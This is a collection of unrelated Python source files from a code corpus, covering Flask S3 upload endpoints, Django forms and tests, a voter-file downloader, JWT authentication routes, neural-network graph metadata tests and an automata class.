    return jsonify(initiation)
@DMC_APP.route("/upload_part", methods=["POST"])
@login_required
def upload_part():
    """ Upload a single part of a multipart upload.
    :return: dictionary containing success status and response or error message
    """
    response, s3_client = get_s3_client()
    if not response['success']:
        return jsonify(response)
    logger.debug("Multipart Upload (Upload Part): request parameters - {}".format(request.form))
    filesize = request.form.get('contentLength')
    upload_id = request.form.get('uploadId')
    # BUG FIX: the raw value was previously passed through int() *before*
    # validation, so a missing or non-numeric partNumber crashed with an
    # unhandled TypeError/ValueError instead of a clean validation response.
    part_num = request.form.get('partNumber')
    filename = request.form.get('filename')
    bucket_name = request.form.get('bucketName')
    inputs_to_validate = {
        'contentLength': filesize,
        'uploadId': upload_id,
        'partNumber': part_num,
        'filename': filename,
        'bucketName': bucket_name
    }
    response = validate_inputs(inputs_to_validate)
    if not response['success']:
        logger.error('Upload part: {}'.format(response['message']))
        return jsonify(response)
    int_inputs_to_validate = {
        'partNumber': part_num
    }
    response = validate_int_inputs(int_inputs_to_validate)
    if not response['success']:
        logger.error('Upload part: {}'.format(response['message']))
        return jsonify(response)
    # Safe to convert now that validate_int_inputs has accepted the value.
    part_num = int(part_num)
    prefix = request.form.get('prefix')
    if prefix:
        filename = "{}{}".format(prefix, filename)
    params = {
        'bucket_name': bucket_name,
        'key': filename,
        'upload_id': upload_id,
        'part_num': part_num,
        'file': request.files['file']
    }
    response = s3_object_operations('upload_part', s3_client, params)
    if not response['success']:
        return jsonify(response)
    return jsonify({'success': True, 'response': {"PartNumber": part_num, "ETag": response['response']["ETag"]}})
@DMC_APP.route("/complete_multipart_upload", methods=["POST"])
@login_required
def complete_multipart_upload():
    """ Complete a multipart upload by assembling its uploaded parts.
    :return: dictionary containing success status and response or error message
    """
    client_status, s3_client = get_s3_client()
    if not client_status['success']:
        return jsonify(client_status)
    logger.debug("Complete Multipart Upload: request parameters - {}".format(request.json))
    upload_id = request.json.get('uploadId')
    parts = request.json.get('parts')
    filename = request.json.get('filename')
    bucket_name = request.json.get('bucketName')
    validation = validate_inputs({
        'uploadId': upload_id,
        'parts': parts,
        'filename': filename,
        'bucketName': bucket_name
    })
    if not validation['success']:
        logger.error('Complete multipart upload: {}'.format(validation['message']))
        return jsonify(validation)
    prefix = request.json.get('prefix')
    if prefix:
        filename = "{}{}".format(prefix, filename)
    completion = s3_object_operations('complete_multipart_upload', s3_client, {
        'bucket_name': bucket_name,
        'key': filename,
        'upload_id': upload_id,
        'parts': {"Parts": parts}
    })
    return jsonify(completion)
@DMC_APP.route("/cancel_multipart_upload", methods=["POST"])
@login_required
def cancel_multipart_upload():
    """ Cancel (abort) an in-progress multipart upload.
    :return: dictionary containing success status and response or error message
    """
    client_status, s3_client = get_s3_client()
    if not client_status['success']:
        return jsonify(client_status)
    logger.debug("Cancel Multipart Upload: request parameters - {}".format(request.json))
    upload_id = request.json.get('uploadId')
    filename = request.json.get('filename')
    bucket_name = request.json.get('bucketName')
    validation = validate_inputs({
        'uploadId': upload_id,
        'filename': filename,
        'bucketName': bucket_name
    })
    if not validation['success']:
        logger.error('Cancel multipart upload: {}'.format(validation['message']))
        return jsonify(validation)
    prefix = request.json.get('prefix')
    if prefix:
        filename = "{}{}".format(prefix, filename)
    abort_result = s3_object_operations('abort_multipart_upload', s3_client, {
        'bucket_name': bucket_name,
        'key': filename,
        'upload_id': upload_id
    })
    return jsonify(abort_result)
@DMC_APP.route("/download", methods=["GET"])
@login_required
def download_objects():
    """ Generate download URLs for the requested objects.
    :return: dictionary containing success status and response or error message
    """
    client_status, s3_client = get_s3_client()
    if not client_status['success']:
        return jsonify(client_status)
    logger.debug("Download Files: request parameters - {}".format(request.args))
    bucket_name = request.args.get('bucket')
    objects = request.args.get('items')
    validation = validate_inputs({
        'bucket': bucket_name,
        'items': objects
    })
    if not validation['success']:
        logger.error('Download files: {}'.format(validation['message']))
        return jsonify(validation)
    # 'items' arrives as a JSON-encoded string on the query string.
    objects = json.loads(objects)
    url_list = []
    for item in objects:
        # Files get a presigned GET URL; folders go through the folder-url helper.
        if item['type'] == 'file':
            operation = 'generate_presigned_url'
            params = {
                'method': 'get_object',
                'params': {'Bucket': bucket_name, 'Key': item['key']},
                'http_method': 'GET'
            }
        else:
            operation = 'generate_folder_url'
            params = {
                'Bucket': bucket_name,
                'key': item['key']
            }
        result = s3_object_operations(operation, s3_client, params)
        if not result['success']:
            return jsonify(result)
        url_list.append(result['response'])
    return jsonify({'success': True, 'response': {'download_urls': url_list}})
@DMC_APP.route("/rename_object", methods=["POST"])
@login_required
def rename_object():
    """ Rename an object by copying it to the new key and deleting the old one.
    :return: dictionary containing success status and response or error message
    """
    client_status, s3_client = get_s3_client()
    if not client_status['success']:
        return jsonify(client_status)
    logger.debug("Rename Object: request parameters - {}".format(request.json))
    bucket_name = request.json.get('bucketName')
    old_key = request.json.get('old_key')
    new_key = request.json.get('new_key')
    object_type = request.json.get('type')
    validation = validate_inputs({
        'old_key': old_key,
        'new_key': new_key,
        'bucketName': bucket_name,
        'type': object_type
    })
    if not validation['success']:
        logger.error('Rename Object: {}'.format(validation['message']))
        return jsonify(validation)
    prefix = request.json.get('prefix')
    if prefix:
        new_key = "{}{}".format(prefix, new_key)
    # Folder-like keys must keep their trailing slash.
    if object_type == 'dir' and new_key[-1] != '/':
        new_key = "{}/".format(new_key)
    copy_result = copy_objects(s3_client, bucket_name, bucket_name, old_key,
                               new_key, object_type, False)
    if not copy_result['success']:
        return jsonify(copy_result)
    elif copy_result.get('key_exists'):
        message = "Folder name already exists." if object_type == 'dir' else "File name already exists."
        return jsonify({'success': False, 'message': message})
    # Copy succeeded — remove the source key(s).
    if object_type == 'dir':
        cleanup = delete_objects_helper(bucket_name=bucket_name, prefix=old_key,
                                        client=s3_client, not_to_del_prefix=new_key)
    else:
        cleanup = delete_objects_by_chunks(s3_client, [{'Key': old_key}], bucket_name)
    if not cleanup['success']:
        return jsonify(cleanup)
    logger.info('Renamed object successfully.')
    return jsonify({'success': True})
def remove_old_downloads():
    """ Function used to delete old downloaded folder's zip files in background.

    Runs forever: every 30 seconds, entries under the ``downloads`` resource
    directory whose mtime is more than an hour old are removed (files are
    unlinked, directories removed recursively). Exceptions are logged and the
    loop keeps running.
    """
    logger.debug('Scheduled task initiated')
    # Resolve the downloads directory once instead of re-joining the path
    # for every entry on every pass (the original recomputed it five times).
    downloads_dir = resource_path('downloads')
    while True:
        try:
            time.sleep(30)
            for entry in os.listdir(downloads_dir):
                entry_path = os.path.join(downloads_dir, entry)
                last_modified = int(os.path.getmtime(entry_path))
                current_time = int(time.time())
                if current_time >= last_modified + 60 * 60:
                    logger.debug('Deleting "{}"'.format(entry_path))
                    if os.path.isfile(entry_path):
                        os.remove(entry_path)
                    else:
                        shutil.rmtree(entry_path)
        except Exception:
            # Log with traceback but keep the background loop alive.
            logger.exception('Scheduled task exited')
        except KeyboardInterrupt:
            pass
if __name__ == "__main__":
    # Run the Flask development server when this module is executed directly.
    DMC_APP.run()
| StarcoderdataPython |
57820 | <reponame>le0park/search_scraper<filename>strategy/core.py<gh_stars>0
from abc import *
class AbstractScrapStrategy(metaclass=ABCMeta):
    """Abstract base for platform-specific search scrapers.

    Concrete strategies override :meth:`scraps` and set :attr:`platform`.
    """

    # Name of the platform this strategy targets; subclasses override it.
    platform = 'etc'
    # Webdriver used to perform the scraping; set in __init__.
    driver = None

    def __init__(self, driver):
        """Store the webdriver this strategy will drive."""
        self.driver = driver

    @abstractmethod
    def scraps(self, query, page_count):
        """Scrape *page_count* pages of results for *query*.

        Base implementation returns an empty list.
        """
        return []
| StarcoderdataPython |
60613 | #!/usr/bin/env python
# coding=utf-8
import unittest
from app.domain.model import User, AnonymousUser, Permission, Role
class UserModelTestCase(unittest.TestCase):
    """Unit tests for the User/Role permission model.

    NOTE(review): the password literals below were replaced by '<PASSWORD>'
    placeholders (dataset anonymization); tests such as
    test_password_verifcation originally used two *different* passwords —
    restore real values before relying on these tests.
    """
    def test_password_setter(self):
        # Setting a password should populate the stored hash.
        u = User(password = '<PASSWORD>')
        self.assertTrue(u.password_hash is not None)
    def test_no_password_getter(self):
        # Reading the plaintext password attribute must be forbidden.
        u = User(password = '<PASSWORD>')
        with self.assertRaises(AttributeError):
            u.password
    def test_password_verifcation(self):
        # verify_password should accept the right password and reject a wrong one.
        u = User(password = '<PASSWORD>')
        self.assertTrue(u.verify_password('<PASSWORD>'))
        self.assertFalse(u.verify_password('<PASSWORD>'))
    def test_password_salts_are_random(self):
        # Two users with the same password must not share a hash (random salts).
        u = User(password = '<PASSWORD>')
        u2 = User(password = '<PASSWORD>')
        self.assertTrue(u.password_hash != u2.password_hash)
    def test_roles_and_permissions(self):
        # A default user can write articles but cannot moderate comments.
        Role.insert_roles()
        u = User(email='<EMAIL>', password="<PASSWORD>")
        self.assertTrue(u.can(Permission.WRITE_ARTICLES))
        self.assertFalse(u.can(Permission.MODERATE_COMMENTS))
    def test_anonymous_user(self):
        # Anonymous users have no permissions at all.
        u = AnonymousUser()
        self.assertFalse(u.can(Permission.FOLLOW))
| StarcoderdataPython |
1771182 | from datetime import date
from django import forms
class BuscaMixin(forms.Form):
    """Base search form exposing month ('mes') and year ('ano') selectors.

    The year choices run from 2017 through next year and default to today.
    """

    ANOS_CHOICES = ()
    MESES_CHOICES = (
        ('1', 'Janeiro'),
        ('2', 'Fevereiro'),
        ('3', 'Março'),
        ('4', 'Abril'),
        ('5', 'Maio'),
        ('6', 'Junho'),
        ('7', 'Julho'),
        ('8', 'Agosto'),
        ('9', 'Setembro'),
        ('10', 'Outubro'),
        ('11', 'Novembro'),
        ('12', 'Dezembro'),
    )

    def __init__(self, *args, **kwargs):
        super(BuscaMixin, self).__init__(*args, **kwargs)
        # Pre-populate the year listing (2017 .. next year) on this instance.
        self.ANOS_CHOICES += tuple(
            (str(ano), str(ano)) for ano in range(2017, date.today().year + 2)
        )
        self.fields['ano'] = forms.ChoiceField(
            label='Ano',
            required=True,
            choices=self.ANOS_CHOICES)
        # Default the selectors to the current month and year.
        self.initial['mes'] = date.today().month
        self.initial['ano'] = date.today().year

    mes = forms.ChoiceField(
        label='Mês',
        required=True,
        choices=MESES_CHOICES,
    )
class BuscaRelatorioForm(BuscaMixin):
    """Search form adding an optional scholarship-holder ('bolsista') selector."""

    def __init__(self, vinculos, *args, **kwargs):
        super(BuscaRelatorioForm, self).__init__(*args, **kwargs)
        # Populate the bolsista drop-down from the supplied vínculos queryset.
        self.fields['bolsista'] = forms.ModelChoiceField(
            queryset=vinculos,
            required=False,
            empty_label='Selecione o bolsista')
class BuscaRelatorioSetorForm(BuscaMixin):
    """Search form adding a mandatory sector ('setor') selector."""

    def __init__(self, setores, *args, **kwargs):
        super(BuscaRelatorioSetorForm, self).__init__(*args, **kwargs)
        # Populate the sector drop-down from the supplied setores queryset.
        self.fields['setor'] = forms.ModelChoiceField(
            queryset=setores,
            required=True,
            empty_label='Selecione o setor')
187343 | """
Downloads North Carolina voterfile and voter history, then extracts to data path.
"""
from io import BytesIO
from bs4 import BeautifulSoup
import os
import requests
import pandas as pd
from zipfile import ZipFile
from download_mggg import download_mggg_state
data_path = os.environ.get('DATA_PATH', '../data')
def download_zip(zip_url, filepath):
    """Download a zip archive from *zip_url* and extract it into *filepath*.

    :param zip_url: URL of the zip archive to fetch
    :param filepath: directory the archive contents are extracted into
    :raises requests.HTTPError: if the HTTP request fails
    :raises zipfile.BadZipFile: if the downloaded payload is not a zip
    """
    print('Making request ...........')
    response = requests.get(zip_url)
    # Fail fast on HTTP errors instead of handing an error page to ZipFile.
    response.raise_for_status()
    zip_content = BytesIO(response.content)
    with ZipFile(zip_content) as file:
        print(f'Extracting file to {filepath}.....')
        file.extractall(filepath)
def download_nc_voterfile_voterhistory(filepath):
    """Download and extract the statewide NC voter file and voter history.

    Fetches two zip archives from the NC State Board of Elections S3 bucket
    and extracts both into *filepath*.
    """
    ncvoter_statewide_url = \
        'https://s3.amazonaws.com/dl.ncsbe.gov/data/ncvoter_Statewide.zip'
    ncvhis_statewide_url = \
        'https://s3.amazonaws.com/dl.ncsbe.gov/data/ncvhis_Statewide.zip'
    download_zip(ncvoter_statewide_url, filepath)
    download_zip(ncvhis_statewide_url, filepath)
def download_nc_precincts_elections(filepath):
    """Downloads Voter Tabulation District shapefiles and election data from github.com/mggg-states."""
    # NOTE(review): this is the GitHub HTML page for the file, not a raw
    # download — raw.githubusercontent.com (or '?raw=true') is likely needed
    # for download_zip to receive actual zip bytes. TODO confirm.
    nc_shapefile_url = 'https://github.com/mggg-states/NC-shapefiles/blob/master/NC_VTD.zip'
    # Removed the unused 'nc_shapefile_metadata_url' local, which was an
    # exact duplicate of the URL above and never referenced.
    download_zip(nc_shapefile_url, filepath)
download_nc_voterfile_voterhistory(f'{data_path}/voter-file')
| StarcoderdataPython |
1797947 | import os
import subprocess
from executors.pythonexecutor import PythonExecutor
def main():
    """Create a Python executor, run it, and print its execution log."""
    executor = PythonExecutor()
    executor.execute()
    print(executor.log)
if __name__ == "__main__":
    # Entry point when executed as a script.
    main()
| StarcoderdataPython |
3238725 | <reponame>lipovsek/aimet<filename>TrainingExtensions/torch/test/python/test_graphmeta.py
# /usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2020, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
import os
import unittest
import pytest
from aimet_torch.meta.graphmeta import GraphMeta
# Test fixture: (full dotted node name, node type, static parameter count).
# Note two nodes share type 'type3' and the last node duplicates leaf1's
# type/parms — several assertions below depend on exactly that layout.
INPUT_NODES = (
    ('rootmod', 'type0', 0),
    ('rootmod.submod1', 'type1', 0),
    ('rootmod.submod2', 'type2', 0),
    ('rootmod.submod1.leaf1', 'type3', 333),
    ('rootmod.submod2.leaf2', 'type4', 244),
    ('rootmod.submod2.leaf3', 'type3', 333),
)
# Test fixture: (node name, MAC count) per simulated invocation; submod1 and
# leaf1 are invoked twice so the dynamic-parameter assertions can exercise
# repeated use of the same node.
INVOCATIONS = [
    (INPUT_NODES[0][0], 0),
    (INPUT_NODES[1][0], 0),
    (INPUT_NODES[3][0], 200),
    (INPUT_NODES[2][0], 0),
    (INPUT_NODES[4][0], 300),
    (INPUT_NODES[5][0], 200),
    (INPUT_NODES[1][0], 0),
    (INPUT_NODES[3][0], 200),
]
class TestTrainingExtensionsGraphMeta(unittest.TestCase):
    """Unit tests for aimet_torch.meta.graphmeta.GraphMeta bookkeeping."""
    def test_duplicate_node_name(self):
        """Re-adding an already registered node name must raise AssertionError."""
        meta = self.create_test_meta()
        full_name, namespc, name, typ, parms = self._split_test_node_attrs(INPUT_NODES[-1])
        with pytest.raises(AssertionError):
            meta.add_node(full_name, namespc, name, typ, parms)
    def test_invalid_node_name(self):
        """Querying stats for an unregistered node must raise KeyError."""
        meta = self.create_test_meta()
        with pytest.raises(KeyError):
            meta.get_node_stats('unknown_node')
    def test_invalid_invocation(self):
        """Recording an invocation of an unregistered node must raise KeyError."""
        meta = self.create_test_meta()
        with pytest.raises(KeyError):
            meta.add_invocation('unknown_node', macs=0)
    def test_valid_meta(self):
        """Cross-check per-node, per-type and aggregate stats against the fixtures."""
        model_name = 'SimpleModel'
        meta = self.create_test_meta(model_name)
        assert meta.model_name == model_name
        assert meta.num_nodes == len(INPUT_NODES)
        node_names = list(meta.yield_node_names())
        assert len(node_names) == len(INPUT_NODES)
        # Node names must come back in registration order.
        for idx in range(len(INPUT_NODES)):
            assert node_names[idx] == INPUT_NODES[idx][0]
        stats_by_type = meta.get_stats_by_type()
        assert len(stats_by_type) == len(set(node[1] for node in INPUT_NODES))
        assert sum(stats['nodes'] for stats in stats_by_type.values()) == len(INPUT_NODES)
        assert sum(stats['parms'] for stats in stats_by_type.values()) == meta.num_parameters
        assert meta.num_invocations == len(INVOCATIONS)
        invocations = list(meta.yield_node_names_invoked(no_dups=False))
        assert len(invocations) == len(INVOCATIONS)
        invocations = list(meta.yield_node_names_invoked(no_dups=True))
        assert len(invocations) == len(set(entry[0] for entry in INPUT_NODES))
        stats_by_type = meta.get_stats_by_type()
        assert len(stats_by_type) == len(set(entry[1] for entry in INPUT_NODES))
        assert sum(stats['uses'] for stats in stats_by_type.values()) == len(INVOCATIONS)
        assert sum(stats['macs'] for stats in stats_by_type.values()) == \
            sum(entry[1] for entry in INVOCATIONS)
        # Accumulate static vs dynamic (per-use) parameter counts and MACs.
        sum_parms_static = 0
        sum_uses = 0
        sum_parms_dyn = 0
        sum_macs = 0
        for node_name in invocations:  # used 'no_dups' so result holds unique nodes
            stats = meta.get_node_stats(node_name)
            parms_static, uses, macs = stats['parms'], stats['uses'], stats['macs']
            sum_parms_static += parms_static
            sum_uses += uses
            sum_parms_dyn += uses * parms_static
            sum_macs += macs
        assert sum_parms_static == sum(entry[2] for entry in INPUT_NODES)
        assert sum_parms_static == meta.num_parameters
        assert sum_uses == len(INVOCATIONS)
        # leaf1 is invoked twice, so dynamic parms exceed static by its parms.
        assert sum_parms_dyn == sum_parms_static + INPUT_NODES[-1][2]
        assert sum_macs == sum(entry[1] for entry in INVOCATIONS)
        assert sum_macs == meta.num_macs
    def test_data_to_dump(self):
        """The dump helper must report the same aggregates as the public API."""
        meta = self.create_test_meta()
        num_parms, num_invocations, num_macs, type_lines = meta._gather_data_to_dump()
        assert num_parms == meta.num_parameters
        assert num_invocations == len(INVOCATIONS)
        assert num_macs == meta.num_macs
        assert len(type_lines) == len(set(node[1] for node in INPUT_NODES))
    @classmethod
    def create_test_meta(cls, model_name='TestModel', data=None):
        """Build a GraphMeta populated from INPUT_NODES (or *data*) and INVOCATIONS."""
        meta = GraphMeta(model_name)
        if not data:
            data = INPUT_NODES
        for node in data:
            full_name, namespc, name, typ, parms_static = \
                cls._split_test_node_attrs(node, prefix=model_name)
            meta.add_node(full_name, namespc, name, typ, parms_static)
        for inv in INVOCATIONS:
            meta.add_invocation(inv[0], inv[1])
        return meta
    @staticmethod
    def _split_test_node_attrs(node, prefix=''):
        """Split a fixture tuple into (full_name, namespace, leaf name, type, parms).

        A dotted name is split at its last dot; an undotted name is treated as
        a leaf under *prefix*.
        """
        full_name, typ, parms = node
        namespc, name = os.path.splitext(full_name)
        if name:
            name = name[1:] # skip period char
        else:
            namespc, name = prefix, namespc
        return full_name, namespc, name, typ, parms
| StarcoderdataPython |
120834 | <reponame>abadojack/StackOverflow-lite
import json
import re
import uuid
from datetime import datetime, timedelta
import jwt
import psycopg2
from flask import jsonify, request
from validate_email import validate_email
from werkzeug.security import check_password_hash
from project.config import Config
from project.database import conn
from project.models.models import User
from . import users
# Module import side effect: clear any aborted transaction on the shared
# connection so later queries don't fail with "current transaction is aborted".
# NOTE(review): on failure the except block retries cursor creation without
# its own guard, so a dead connection still raises at import time — confirm
# whether that is intended.
try:
    cur = conn.cursor()
    cur.execute("ROLLBACK")
    conn.commit()
except Exception as e:
    print('connection exception ', e)
    cur = conn.cursor()
    cur.execute("ROLLBACK")
def auth_encode(user_id):
    """Generate a signed JWT auth token for *user_id*, expiring in one hour.

    :param user_id: value stored as the token's ``sub`` claim
    :return: the encoded JWT
    """
    # The previous ``except Exception as ex: raise ex`` wrapper was a no-op
    # (it re-raised the same exception unchanged) and has been removed.
    payload = {
        'exp': datetime.now() + timedelta(hours=1),
        'iat': datetime.now(),
        'sub': user_id
    }
    return jwt.encode(
        payload,
        Config.SECRET
    )
def auth_decode(token):
    """Decode a JWT auth token and return its subject (user id), or None.

    Any decoding failure (expired, malformed, bad signature) is logged and
    reported as None.
    """
    try:
        return jwt.decode(token, Config.SECRET)['sub']
    except Exception as e:
        print('auth_token error', e)
        return None
def insert_token(token):
    """Persist a blacklisted (expired) token so it can no longer be used.

    :param token: the JWT string to blacklist
    """
    # SECURITY FIX: the previous version interpolated the token directly into
    # the SQL string, which is an SQL-injection vector. Use psycopg2's
    # parameter binding instead.
    query = "INSERT INTO tokens (id, expired_tokens) VALUES (%s, %s);"
    cur.execute(query, (str(uuid.uuid4()), token))
    conn.commit()
def get_token(token):
    """Return the matching blacklisted-token row, or None if not blacklisted.

    :param token: the JWT string to look up
    :return: a one-element tuple with the token, or None
    """
    # SECURITY FIX: parameterized query instead of string interpolation,
    # which allowed SQL injection via the token value.
    cur.execute("SELECT expired_tokens FROM tokens WHERE expired_tokens = %s;",
                (token,))
    return cur.fetchone()
def get_user_id():
    """Return the user id encoded in the request's 'token' header, or None."""
    return auth_decode(request.headers.get('token', None))
@users.route('/auth/signup', methods=['POST'])
def signup():
    """Register a new user.

    Expects a JSON body with ``username``, ``password`` and ``email``.
    :return: JSON response and HTTP status code
    """
    try:
        username = json.loads(request.data.decode())['username']
        password = json.loads(request.data.decode())['password'].replace(" ", "")
        email = json.loads(request.data.decode())['email'].replace(" ", "")
        if re.match(r'^[a-zA-Z][-\w.]{0,22}([a-zA-Z\d]|(?<![-.])_)$', username) is None:
            return jsonify({'response': 'invalid username'}), 400
        if not validate_email(email):
            return jsonify({'response': 'invalid email'}), 400
        # NOTE(review): the match is unanchored, so only the first 8
        # characters need to be from the allowed set — TODO confirm intent.
        if re.match(r'[A-Za-z0-9@#$%^&+=]{8,}', password) is None:
            # BUG FIX: the message said "6 or more" but the regex requires 8.
            return jsonify({'response': 'password must contain 8 or more characters'}), 400
        """
        search if the user exists in the database
        """
        user = User(username, email, "")
        if user.exists() is None:
            user.create_user(password)
            return jsonify({'response': 'user created successfully'}), 201
        else:
            return jsonify({'response': 'user already exists'}), 409
    except (KeyError, ValueError) as ex:
        print('response', ex)
        return jsonify({'response': 'json body must contain username, password and email'}), 400
    except (psycopg2.DatabaseError, psycopg2.IntegrityError, Exception) as ex:
        print('error in signup', ex)
        return jsonify({'response': 'something went wrong'}), 500
@users.route('/auth/login', methods=['POST'])
def login():
    """Log in an existing user and return a JWT on success.

    Expects a JSON body with ``username`` and ``password``.  Returns 200 with
    a token on success, 404 for an unknown user, 422 for a wrong password and
    400 for a malformed body.
    """
    try:
        data = json.loads(request.data.decode())
        username = data['username'].replace(" ", "")
        password = data['password'].replace(" ", "")
        user = User(username, "", "").exists()
        if user is None:
            # Previously an unknown user surfaced as an AttributeError that
            # was swallowed by the broad except below; make the 404 explicit.
            return jsonify({'response': 'user not found'}), 404
        if check_password_hash(user.password_hash, password):
            token = auth_encode(user.user_id)
            if token:
                return jsonify({'response': 'login successful', 'token': token.decode()}), 200
        # BUG FIX: the original fell through and returned None (an HTTP 500)
        # when the password was wrong; reject explicitly instead.
        return jsonify({'response': 'invalid username/password'}), 422
    except (KeyError, ValueError) as ex:
        print('error in login', ex)
        return jsonify({'response': 'json body must contain username and password'}), 400
    except (psycopg2.DatabaseError, psycopg2.IntegrityError, Exception) as ex:
        print('error in login', ex)
        return jsonify({'response': 'user not found'}), 404
@users.route('/auth/signout', methods=['POST'])
def signout():
    """Sign out the current user by blacklisting their token."""
    try:
        token = request.headers.get('token')
        already_blacklisted = get_token(token) is not None
        if already_blacklisted:
            # Token was signed out before — treat it as invalid.
            return jsonify({'response': 'Invalid token'}), 401
        insert_token(token)
        return jsonify({'response': 'signed out'}), 200
    except Exception as ex:
        print('response', ex)
        return jsonify({'response': 'something went wrong'}), 500
| StarcoderdataPython |
147414 | """
This module contains the structs necessary to represent an automata.
"""
from __future__ import annotations
import logging
from typing import Any, Dict, Iterable, List, Set, Tuple, Union
from numlab.automata.state import State
from numlab.automata.transition import Transition
_ATMT_COUNT = 0
class Automata:
    """
    An automata.

    Parameters
    ----------
    name : str
        The name of the automata.

    Attributes
    ----------
    name : str
        The name of the automata.
    states : Dict[str, State]
        The states of the automata.
    start_states : List[State]
        The start states of the automata.
    end_states : List[State]
        The end states of the automata.
    """

    def __init__(self, name: str = None) -> None:
        if name is None:
            # Auto-generate a unique name from a module-level counter.
            global _ATMT_COUNT
            name = f"atmt_{_ATMT_COUNT}"
            _ATMT_COUNT += 1
        self.name = name
        self.states: Dict[str, State] = {}
        self.start_states: List[State] = []
        self.end_states: List[State] = []
        # Simulation bookkeeping used by ``run``/``_step``.
        self._pos = 0
        self._input = None
        self._current_state: State = None
        self._processes: List[Tuple[State, int]] = []
        self._processes_idx: int = 0

    def __getattr__(self, item: str) -> Any:
        # Allow ``automata.q0``-style attribute access to named states.
        if item in self.states:
            return self.states[item]
        raise AttributeError(f"No attribute {item}")

    @property
    def alphabet(self) -> Set[Tuple[Any, bool]]:
        """
        Get the alphabet of the automata.

        Returns
        -------
        List[Any]
            The alphabet of the automata.
        """
        alphabet = set()
        for state in self.states.values():
            for transition in state.transitions:
                if transition.is_epsilon:
                    continue
                if isinstance(transition.condition, str):
                    alphabet.add(transition.condition)
                else:
                    # Non-string conditions are iterables of symbols.
                    alphabet.update(transition.condition)
        return alphabet

    def concatenate(self, other: Automata, set_single: bool = False) -> Automata:
        """
        Concatenate the automata with another one.

        Parameters
        ----------
        other : Automata
            The other automata.
        set_single : bool, optional
            Whether to set the automata to have a single start and end state
            when needed, by default False.

        Returns
        -------
        Automata
            The concatenated automata.

        Raises
        ------
        ValueError
            If the current automata has multiple end states and ``set_single`` is
            False.
        ValueError
            If the other automata has multiple start states and ``set_single`` is
            False.
        """
        if len(self.end_states) != 1:
            if set_single:
                self.set_single_end()
            else:
                raise ValueError(f"Automata {self.name} has multiple end states.")
        if len(other.start_states) != 1:
            if set_single:
                other.set_single_start()
            else:
                raise ValueError(f"Automata {other.name} has multiple start states.")
        other = other.flat()
        other_first_state = other.start_state
        other_last_state = other.end_state
        # Merge the other automata's start state into our single end state and
        # redirect any transitions that pointed at the merged state.
        self.end_state.merge(other_first_state)
        if other_last_state == other_first_state:
            other_last_state = self.end_state
        for state in other.states.values():
            for trans in state.transitions:
                if trans.to_state is other_first_state:
                    trans.to_state = self.end_state
        self.end_states = [other_last_state]
        return self

    @property
    def pos(self) -> int:
        """Position of the automata on the input"""
        return self._pos

    @property
    def start_state(self) -> State:
        """Get the start state of the automata."""
        if len(self.start_states) == 1:
            return self.start_states[0]
        raise ValueError("The automata has multiple start states.")

    @property
    def end_state(self) -> State:
        """Get the end state of the automata."""
        if len(self.end_states) == 1:
            return self.end_states[0]
        raise ValueError("The automata has multiple end states.")

    def add_state(
        self,
        state: Union[str, State] = None,
        start: bool = False,
        end: bool = False,
        name: str = None,
    ) -> State:
        """
        Add a state to the automata.

        Parameters
        ----------
        state : Union[str, State]
            The name of the state to add or the state itself.
        start : bool
            Whether the state is a start state.
        end : bool
            Whether the state is an end state.
        name : str
            Key under which to register the state (defaults to the state's
            own name).

        Returns
        -------
        State
            The added state.
        """
        if state is None:
            state = State(f"q{len(self.states)}")
        if isinstance(state, str):
            if state in self.states:
                raise ValueError(f"State {state} already exists.")
            state = State(state)
        state.automata = self
        name = name if name is not None else state.name
        self.states[name] = state
        if start:
            self.start_states.append(state)
        if end:
            self.end_states.append(state)
        return state

    def add_transition(
        self,
        from_state: Union[str, State],
        to_state: Union[str, State],
        condition: Any = None,
        action: int = None,
        negated: bool = False,
    ) -> None:
        """
        Add a transition to the automata.

        Parameters
        ----------
        from_state : Union[str, State]
            The state from which the transition starts.
        to_state : Union[str, State]
            The state to which the transition goes.
        condition : Any
            The condition under which the transition is taken.
        action : int
            The action to perform when the transition is taken.
        negated : bool
            Whether the condition is negated.

        Raises
        ------
        ValueError
            If any of the states does not exist.
        """
        if isinstance(from_state, str):
            from_state = self.states.get(from_state, None)
            if from_state is None:
                raise ValueError(f"No state {from_state} defined.")
        if isinstance(to_state, str):
            to_state = self.states.get(to_state, None)
            if to_state is None:
                raise ValueError(f"No state {to_state} defined.")
        if action is None:
            # Epsilon transitions consume nothing; conditional ones advance 1.
            action = 0 if condition is None else 1
        transition = Transition(from_state, to_state, condition, action, negated)
        from_state.transitions.append(transition)
        return transition

    def set_single_start(self) -> State:
        """
        Set the automata to have a single start state.

        Returns
        -------
        State
            The start state.
        """
        if len(self.start_states) == 1:
            return self.start_states[0]
        start_st = self.add_state(f"_start_{self.name}")
        for state in self.start_states:
            self.add_transition(start_st, state)
        self.start_states = [start_st]
        return start_st

    def set_single_end(self) -> State:
        """
        Set the automata to have a single end state.

        Returns
        -------
        State
